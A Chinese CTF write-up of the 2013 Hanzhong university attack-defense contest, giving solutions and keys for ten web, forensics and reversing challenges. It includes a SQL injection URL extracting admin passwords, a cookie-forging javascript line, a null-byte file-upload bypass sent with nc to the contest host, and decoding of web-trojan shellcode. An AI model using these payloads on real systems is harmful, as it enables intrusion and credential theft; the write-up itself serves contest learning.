我在2013年首届汉中高校攻防赛中通关

【写在开篇】

http://218.195.96.59/index.asp

汉中高校攻防赛入口。挺有意思的，大家可以玩玩。

============================================================================

1.

修改网页源代码，出来一个隐藏的text框框（显示的框框要填50），往里面填：Icanseeit
出来：key:HiddenNotHere

2.

unicode(base64(jpg))
解析后：anBn
一看就是base64加密，解密后发现是一堆16进制的字符，我果断想到了把它们写到2进制文件中
然后看生成的文件是图片格式：FFD8-FFD9，改后缀为jpg，就出来key

#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>

using namespace std;

int main()
{
    freopen("1.jpg","wb",stdout);
    stringstream ss;
    stringstream outss;
    ss<<"FFD8FFE000104A46494600010101006000600000FFDB004300080606070605080707070909080A0C140D0C0B0B0C1912130F141D1A1F1E1D1A1C1C20242E2720222C231C1C2837292C30313434341F27393D38323C2E333432FFDB0043010909090C0B0C180D0D1832211C213232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232FFC0001108001E00E003012200021101031101FFC4001F0000010501010101010100000000000000000102030405060708090A0BFFC400B5100002010303020403050504040000017D01020300041105122131410613516107227114328191A1082342B1C11552D1F02433627282090A161718191A25262728292A3435363738393A434445464748494A535455565758595A636465666768696A737475767778797A838485868788898A92939495969798999AA2A3A4A5A6A7A8A9AAB2B3B4B5B6B7B8B9BAC2C3C4C5C6C7C8C9CAD2D3D4D5D6D7D8D9DAE1E2E3E4E5E6E7E8E9EAF1F2F3F4F5F6F7F8F9FAFFC4001F0100030101010101010101010000000000000102030405060708090A0BFFC400B51100020102040403040705040400010277000102031104052131061241510761711322328108144291A1B1C109233352F0156272D10A162434E125F11718191A262728292A35363738393A434445464748494A535455565758595A636465666768696A737475767778797A82838485868788898A92939495969798999AA2A3A4A5A6A7A8A9AAB2B3B4B5B6B7B8B9BAC2C3C4C5C6C7C8C9CAD2D3D4D5D6D7D8D9DAE2E3E4E5E6E7E8E9EAF2F3F4F5F6F7F8F9FAFFDA000C03010002110311003F00F63BCD52E05C3C71908A8C5781927F3AAD79AE4963A67DB2E2E4471AB36F7283007CB8EDEF5CDEB1776D6DE22BEB3B9F885A3E9F708C2636D736E8A625724AAEE69064E07D70412006197F8C6D2E2C3C077B6D7774B753A07DD32C5E586CEC23E5C9C7040EBDAA6CC64FFF000B174AFF00A0DC1FF7CFFF005A8FF858BA57FD06E0FF00BE7FFAD57E5F885A758EB1E2AB6D593EC563E1FF00B2799799693CCF3D723E455C8C120719CE73C5686A5E36F0EE91A8CD637DA8797341E57DA184323C76DE69C47E6C8AA522DC7A6F238C1E8734EC17303FE162E95FF41B83FEF9FF00EB51FF000B174AFF00A0DC1FF7CFFF005AB7F50F1B78774BFED8FB6EA1E57F63791F6FFDCC8DE4F9D8F2FA29DD9C8FBB9C77C558D63C53A3683A8E9761A9DE79175AA4BE4D9A794EDE6BE54632A081CBAF5C75A2C17398FF00858BA57FD06E0FFBE7FF00AD47FC2C5D2BFE83707FDF3FFD6ADFD43C6DE1DD2FFB63EDBA8795FD8DE47DBFF7323793E763CBE8A776723EEE71DF151DF78F7C37A6EA977A75E5FC914F64F125D39B598C56E65C797E64A136203B872580FC8D160B989FF0B174AFFA0DC1FF007CFF00F5A8FF00858BA57FD06E0FFBE7FF00AD5AFA8F8A1ADFC77A2E810CD046B75E7FDA12E6D2E03CBB620EBE44817CA6C7F1E5B8E075E2AC6A5E36F0EE91A8CD637DA8797341E57DA184323C76DE69C47E6C8AA522DC7A6F238C1E8734582E607FC2C5D2BFE83707FDF3FF00D6A3FE162E95FF0041B83FEF9FFEB56FEA5E36F0EE91A8CD637DA8797341E57DA184323C76DE69C47E6C8AA522DC7A6F238C1E873597E35F891A67846C35168E29351D42C12179AD225936C62470ABE64AA8C919232406C13818EA28B05CA9FF000B174AFF00A0DC1FF7CFFF005A8FF858BA57FD06E0FF00BE7FFAD5BFA978DBC3BA46A3358DF6A1E5CD0795F68610C8F1DB79A711F9B22A948B71E9BC8E307A1CD1AB789FEC3E28D1FC3D6767F6CBEBFDF2CDFBDDAB6B6E83E695F018F270AA08019B2370A2C17303FE162E95FF0041B83FEF9FFEB51FF0B174AFFA0DC1FF007CFF00F5AADBFC48D32CFC59AE68BAAC525941A5BDAA7DB8AC9244C67504798CA9B61009032ED839ED835B9AC78A349D02545D5269EDA36D99B86B494C09B9B6AEF98298D39C7DE618C827834582E731FF000B174AFF00A0DC1FF7CFFF005A8FF858BA57FD06E0FF00BE7FFAD5D1DE78BB47B2D527D31A4BBB8BCB74479E2B2B19EE8C21F3B77F948C14900900E0E39E86A3D4BC6DE1DD23519AC6FB50F2E683CAFB43086478EDBCD388FCD9154A45B8F4DE47183D0E68B05CC0FF00858BA57FD06E0FFBE7FF00AD47FC2C5D2BFE83707FDF3FFD6ABFAC78FACF4FF1CE97E15B63633DDDCFCD76D3DF083ECAA4A8400153E648FBBE58C1DDD09C29DC0D6FE2169DE1CF15CFA4EAC9F67B1834A5D4A4BECB3EDDD38842796AA49E483907F0EF4582E50FF858BA57FD06E0FF00BE7FFAD47FC2C5D2BFE83707FDF3FF00D6ADFD5BC4FF0061F1468FE1EB3B3FB65F5FEF966FDEED5B5B741F34AF80C7938550400CD91B8557F1578A1B44D4744B18268219AFB5082076BBB4B868DE372C0A47246A504C48E0310319278E68B05CC8FF00858BA57FD06E0FFBE7FF00AD47FC2C5D2BFE83707FDF3FFD6ADBBEF1EF86F4DD52EF4EBCBF9229EC9E24BA736B318ADCCB8F2FCC9426C40770E4B01F91A35AF1EF86FC3F717506A37F223D9A46F7462B59A65B7121C2798D1A3042DD83104E47A8A2C17313FE162E95FF0041B83FEF9FFEB51FF0B174AFFA0DC1FF007CFF00F5AB7F56F13FF62F8A347D2EF2CF6D8EABBE286FFCDC2C7700656270400378CED218966046DEF46ADE27FEC5F1468FA5DE59EDB1D577C50DFF009B858EE00CAC4E08006F19DA4312CC08DBDE8B05CC0FF858BA57FD06E0FF00BE7FFAD5A7A1F8DF4DD5B52874F86FE09E69776D0A0863805BE9D01AD0F09CF35CE8F70F3CB24AE353BF40CEC58855BB995473D828000EC0015B94582E737AE68DA936A916ABA33C6F70EF025DDBCF74D6E92C30F9EC803A23303E64AA48E8C1369E09071BE20199BC1B7CD711C71CE63CC891B97556DB1E406201233DF033E82BBDACCD7342B4D7F4D9AC6E8C891CA30CF0901BB7A823B0EDDA9B11C16B5F0E358BAF17EBBE26B0B9B117D25DD85DE971DCBBB43BA18CC7209E3DA41E09DACBF329E432F39B1AAFC376D4BC69ADEA17B6F06A3A46B5F64F3E07D4EE2D0C3E50DA729182B374561B8AE0F1C753E914500787F8C34AFEDAF16F88B41D16FEC75293C552D947762DA6DF3694B6AC04AF2201B4A8C28F99D18B36D00915EB1AC7FC249FDA3A5FF627F657D87CDFF898FDB7CCF33CBCAFFA9DBC6EC6FF00BDC676FBD6C51401E57E32F873AF6B171E2F5D2E5D35E0F12258967BA9DE26B66B72380AB1B070C00E72B8C9E0E3993C51F0E358D6FF00E13DFB35CD8A7FC243FD9FF64F31DC6CFB3EDDFE6614E338E319F7C57A851401C3F89341F126A3E3BD035CB0B5D29AD745FB46C49EFA48DE7F3A20872042C136907BB67DA83E1BF12697E34F106B3A249A53C7ADFD8F7BDEB499B5F24146C46A3F7B95391F3A73C74193DC51401E5FE2AF871AC6B5A8F8A92CEE6C458F897EC1E74D33BAC969F672376D40A44B90011964E4E3DEA3F197C39D7B58B8F17AE972E9AF078912C4B3DD4EF135B35B91C0558D8386007395C64F071CFAA51401E6FAAFC376D4BC69ADEA17B6F06A3A46B5F64F3E07D4EE2D0C3E50DA729182B374561B8AE0F1C753A1AB585E69BF16B47F1147693DD58DF69EFA3DC343196FB236FF003639182E4956395270157A96E715DC51401E57E26F873AF6B7AA78C23825D363D3FC48F600CEF3BF9B6CB6FB771F2C47872707037AF6E7D24F883E02F13F8AE5D621B6D46096C6F62B65B48E7BE9ADD2CCC6DBA40628D5926DE70773F2BDBEE8AF50A280383F13784F59D4759B8BDD063B4D22F277B70DABC5A94EB232C6C0E64B554114C40DEA03B1C823240E053D57E1BB6A5E34D6F50BDB78351D235AFB279F03EA7716861F286D3948C159BA2B0DC57078E3A9F48A2803CBFC55F0E358D6B51F15259DCD88B1F12FD83CE9A677592D3ECE46EDA814897200232C9C9C7BD58F1F7C2F97C4F06B777A6EAD3A6A7A945041E55DB21B758E3756D80F96D22292A5F0AC017C135E9145007077DA65F68FF14B42D784777A8DA5DE98DA35D4EB165ADDC3F9A92B88D790EC0A9215557A920102A9FC49BFB3BED63C23A459DDC171A9C1E25B39E6B28640F3471AABB33B20F9828520924600E6BD228A00F13D57C3BA978BBC6FF12BC3F646D2282F5F491737534AC1A05540F948C29121214F0593B73CF14FE29D9FD925F1AC565A8E957B75E20FECD43A72DDE2FA2922650AA90056326E055BAA9009E0E39F78A280387F1AD85E7883C51E13D22DAD2716F67A82EB1777DE59F2E15841D91E4E1599D9B180DB940C95228F1AD85E7883C51E13D22DAD2716F67A82EB1777DE59F2E15841D91E4E1599D9B180DB940C9522BB8A28039FF06FFC80EE7FEC2BA97FE96CD5D05470C10DB2148228E242ECE5514282CCC598F1DCB1249EE493525007FFD9";
    char ch[2];
    while(ss>>ch[0]>>ch[1])
    {
        outss.clear();
        outss<<ch[0]<<ch[1]<<endl;
        int i;
        outss>>hex>>i;
        printf("%c",(char)i);
    }
    return 0;
}

3.

key:ar4itraryfilesdownlo1ded
星星点灯.mp3的url是经过两次base64编码，那么我们就把title所写的：key.txt
也经过两次base64编码，出来一个信息是：iskey.txt，再2次base64，出来一个showkey.jsp
再来两次base64，爆出key。
这道题不是我想出来的，思路很奇葩，果然是要敢想敢做。

4.

就是一个简单的注入：
http://218.195.96.29/asp/1/tume.asp?id=11'%20Union%20Select%201,password%20from%20admin%20where%20'1'='1
KEY:4b378055b5b521da6e2b7536e21b22c1
MD5解密后：crackmd5

5.

一看就知道是cookie修改： javascript:document.cookie="level="+escape("admin");
然后刷新一下就好了：Smart Boy,KeY Is admin888

6.

Key:QRSTUVWXYZabcdef
竟然是个rar文件
把网马解密后出现后的shellcode拿下来：

#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>

using namespace std;

int main()
{
    freopen("1.txt","wb",stdout);
    stringstream ss;
    stringstream outss;
    ss<<"%u6152%u2172%u071A%uCE00%u7399%u0080%u000D%u0000%u0000%u0000%u6063%u155D%u3E7B%u3C8F%u860D%u76D2%uBE49%uC5AF%uA3F0%u2683%u3B73%uBB72%uBE19%u8928%uAEA2%u9A6E%uDBCA%u06DD%uB1F3%u2FFC%u93CE%u4C1E%uAC6E%u9727%u431E%u82EB%u9FC1%u8095%u7AB4%u266B%uD2C4%uAEC6%u28DD%u9E2E%uA4FE%u5FE6%uADA2%uDD57%uE407%uA291%uF9F7%u86B5%uE867%u5672%u5293%u23C7%u0D47%u705C%uCDD9%u3D9B%u7E0A%uC9B6%u2239%u0337%u7878%u3165%uB8BF%u634F%uC4BB%u1649%u6063%u155D%u3E7B%u3C8F%u0BBF%uDEAE%u40D6%u7D01%uB93F%u944C%u9940%uB608";
    char ch[2],curch[2];
    int flag=0;
    while(ss>>curch[0]>>curch[1])
    {
        if(curch[0] == '%' &&curch[1] == 'u')
            continue;
        if(flag^=1)
        {
            ch[0]=curch[0];
            ch[1]=curch[1];
        }
        if(!flag)
            outss<<curch[0]<<curch[1]<<ch[0]<<ch[1];
    }
    int i;
    while(outss>>ch[0]>>ch[1])
    {
        stringstream ts;ts<<ch[0]<<ch[1]<<endl;
        ts>>hex>>i;
        printf("%c",char(i));
    }
    return 0;

}

发现是一个加密的rar，暴力破解是人是sb。
我在页面上找msg一个个填进去，填到：QRSTUVWXYZabcdef 成功。

7.

先抓包，存在packet.txt中，用UE打开，在1.asp.;.jpg这里把
asp后面的字节用00代替。
用nc post发送这个包：C:\>nc.exe 218.195.96.29 80 < packet.txt
收到的回馈是：Key is uPloaD00CrACkThaT<center>上传成功

8.

不断地转转。。
msgbox "Can u get this key?~,~!"rem "Key is PasSTHeVbSDeCOd3
（用生成的文件中的字符串代替输入到ss中。。）
不过倒是学会了vb的一个函数： Split(expression[, delimiter[, count[, compare]]])
count为-1的时候，表示所有子字符串
compare为1的时候，表示文字比较。貌似0为2进制比较？

#include <iostream>
#include <cstdio>
#include <math.h>
#include <cstring>
#include <sstream>
#include <stdio.h>

using namespace std;
int main()
{
    freopen("1.txt","w",stdout);
    stringstream ss,ts;
    ss<<"109,115,103,98,111,120,32,34,67,97,110,32,117,32,103,101,116,32,116,104,105,115,32,107,101,121,63,126,44,126,33,34,114,101,109,32,34,75,101,121,32,105,115,32,80,97,115,83,84,72,101,86,98,83,68,101,67,79,100,51,34";


    char ch[3];
    while(ss>>ch[0])
    {
        if(ch[0]==',')
        {
            ts<<endl;
            int i;
            ts>>i;
            printf("%c",char(i));
            ts.clear();
        }
        else
        {
            ts<<ch[0];
        }
    }
    return 0;
}

9.

这个只能静态分析，而不是OD下搞起。
IDA下找到关键代码：
.text:00401564                 mov     al, 31h
.text:00401566                 mov     cl, 42h
.text:00401568                 mov     [esp+0Bh], al
.text:0040156C                 mov     [esp+0Eh], al
.text:00401570                 mov     al, 52h
.text:00401572                 push    edi
.text:00401573                 mov     [esp+15h], al
.text:00401577                 mov     [esp+18h], cl
.text:0040157B                 mov     [esp+19h], cl
.text:0040157F                 mov     [esp+1Ah], al
.text:00401583                 mov     [esp+1Dh], al
.text:00401587                 lea     edi, [esp+0Ch]
.text:0040158B                 or      ecx, 0FFFFFFFFh
.text:0040158E                 xor     eax, eax
.text:00401590                 mov     byte ptr [esp+0Ch], 5Ah
.text:00401595                 mov     byte ptr [esp+0Dh], 74h
.text:0040159A                 mov     byte ptr [esp+0Eh], 68h
.text:0040159F                 mov     byte ptr [esp+10h], 78h
.text:004015A4                 mov     byte ptr [esp+11h], 62h
.text:004015A9                 mov     byte ptr [esp+13h], 5Ch
.text:004015AE                 mov     byte ptr [esp+14h], 77h
.text:004015B3                 mov     byte ptr [esp+16h], 41h
.text:004015B8                 mov     byte ptr [esp+17h], 70h
.text:004015BD                 mov     byte ptr [esp+1Bh], 63h
.text:004015C2                 mov     byte ptr [esp+1Ch], 25h
.text:004015C7                 mov     byte ptr [esp+1Eh], 7Ah
.text:004015CC                 mov     byte ptr [esp+1Fh], 56h
.text:004015D1                 mov     byte ptr [esp+20h], 21h
.text:004015D6                 mov     byte ptr [esp+21h], 5Eh
.text:004015DB                 mov     byte ptr [esp+22h], 75h
.text:004015E0                 mov     byte ptr [esp+23h], 0
.text:004015E5                 xor     edx, edx
.text:004015E7                 repne scasb
.text:004015E9                 not     ecx
.text:004015EB                 dec     ecx
.text:004015EC                 jz      short loc_40160C
.text:004015EE
.text:004015EE loc_4015EE:                             ; CODE XREF: .text:0040160Aj
.text:004015EE                 mov     cl, [esp+edx+0Ch]
.text:004015F2                 lea     edi, [esp+0Ch]
.text:004015F6                 xor     cl, 11h
.text:004015F9                 xor     eax, eax
.text:004015FB                 mov     [esp+edx+0Ch], cl
.text:004015FF                 or      ecx, 0FFFFFFFFh
.text:00401602                 inc     edx
.text:00401603                 repne scasb
.text:00401605                 not     ecx
.text:00401607                 dec     ecx
.text:00401608                 cmp     edx, ecx
.text:0040160A                 jb      short loc_4015EE
.text:0040160C
.text:0040160C loc_40160C:                             ; CODE XREF: .text:004015ECj
.text:0040160C                 push    0
.text:0040160E                 lea     eax, [esp+10h]
.text:00401612                 push    0
.text:00401614                 push    eax
.text:00401615                 call    ?AfxMessageBox@@YGHPBDII@Z ; AfxMessageBox(char const *,uint,uint)
.text:0040161A                 pop     edi

大意：有一个字符串，它以esp+OCH开始。然后每个字符xor一个0x11，用c++写了下：
其中的"Zth0x0b\wRApBBRc%RzV!^u"是把esp+0CH用2进制写到文件的生成的字符串。

#include <iostream>
#include <fstream>
#include <list>
#include <string>
#include <iterator>
#include <stdio.h>
#include <stdlib.h>
#include <sstream>

using namespace std;

int main()
{
    freopen("1.txt","wb",stdout);
    stringstream ss;
    stringstream outss;
    ss<<"Zth0x0b\wRApBBRc%RzV!^u";
    string s="Zth0x0b\wRApBBRc%RzV!^u";
    for(int i=0;i<s.size();i++)
    {
        s[i]=(int)s[i]^0x11;
        printf("%c",(char)s[i]);
    }
    return 0;

}

然后生成的文件为：Key!i!sfCPaSSCr4CkG0Od
Ps：!（感叹号）是因为[esp+0Fh]、[esp+12h]都没有，我就用“0”代替了，结果果然不影响，哈哈。

10.

key:.Ne7c#CR4cK1sG0Ok
发现它是用C# dotnet写的，果断上.NET Reflector 7.0.0.420 Crack
然后源代码就出来了，逆推key就行。